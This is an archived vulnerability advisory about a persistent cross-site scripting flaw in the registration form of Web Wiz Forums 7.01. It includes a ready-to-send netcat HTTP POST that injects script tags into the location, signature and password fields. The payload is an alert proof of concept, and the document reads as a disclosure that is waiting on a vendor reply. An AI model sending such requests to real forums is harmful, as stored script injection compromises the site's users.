Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: etc :: bt1720.txt

Web Wiz Forums ver. 7.01





Informations :
같같같같같같
Language : ASP
Bugged Version : Web Wiz Forums ver. 7.01 (and less ?)
Website : http://www.webwizforums.com
Problems : Permanent XSS


Objects :
같같같
- register_new_user.asp
- register.asp

The values variable are not filtered:

strLocation = Request.Form("location")
strMessage = Request.Form("signature")
strPassword = Request.Form("password")


Exploits :
같같같같
>nc target 80
POST /forum/register_new_user.asp?ForumID=0 HTTP/1.0
Host: hack.microsoft.com
Cookie: ASPSESSIONIDQAQADDRS=BMPCJPJABCBODDOMLADBBAMC; ForumVisit=LastVist=37938%2C9186342593; Forum=UserID=%5BHEX%5D7384706469134q1&Hide=True
Content-type: application/x-www-form-urlencoded
Content-length: 290
Connection: keep-alive
Posting 290 bytes...
name=%5BHEX%5D
password=">[CODE]
password2=">[CODE]
email=support%40microsoft.com
emailShow=True
location=">[CODE]
homepage=http%3A%2F%2Fhex.net.ru
Login=True
ActiveUsers=False
signature=">[CODE]
countcharacters=28
Submit=%C7%E0%F0%E5%E3%E8%F1%F2%F0%E8%F0%EE%E2%E0%F2%FC%F1%FF

P.S. The value NAME should coincide with whose that by a nick from a forum !!!


Example:
같같같같
>nc target 80
POST /forum/register_new_user.asp?ForumID=0 HTTP/1.0
Host: hack.microsoft.com
Cookie: ASPSESSIONIDQAQADDRS=BMPCJPJABCBODDOMLADBBAMC; ForumVisit=LastVist=37938%2C9186342593; Forum=UserID=%5BHEX%5D7384706469134q1&Hide=True
Content-type: application/x-www-form-urlencoded
Content-length: 290
Connection: keep-alive
Posting 290 bytes...
name=%5BHEX%5D
password=%22%3E%3CSCRIPT%3EALERT%28%27XSS+atack+by+%5BHEX%5D+%28c%29+%5BCSL%5D%27%29%3C%2FSCRIPT%3E
password2=%22%3E%3CSCRIPT%3EALERT%28%27XSS+atack+by+%5BHEX%5D+%28c%29+%5BCSL%5D%27%29%3C%2FSCRIPT%3E
email=support%40microsoft.com
emailShow=True
location=%22%3E%3CSCRIPT%3EALERT%28%27XSS+atack+by+%5BHEX%5D+%28c%29+%5BCSL%5D%27%29%3C%2FSCRIPT%3E
homepage=http%3A%2F%2Fhex.net.ru
Login=True
ActiveUsers=False
signature=%22%3E%3CSCRIPT%3EALERT%28%27XSS+atack+by+%5BHEX%5D+%28c%29+%5BCSL%5D%27%29%3C%2FSCRIPT%3E
countcharacters=28
Submit=%C7%E0%F0%E5%E3%E8%F1%F2%F0%E8%F0%EE%E2%E0%F2%FC%F1%FF


Patch/More Details :
같같같같같같같같같
There was no opportunity to check up it on the version 7.5 and 7.51 :(
Waiting for the reply from technical support at http://www.webwizforums.com ...


[ Local time 21:50   | p適診 云瘡孼,  魏  張 桎蟻惟 誼怏 鍊詢... ]
[ Copyright by [HEX] | mailto:hex@hex.net.ru ]


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH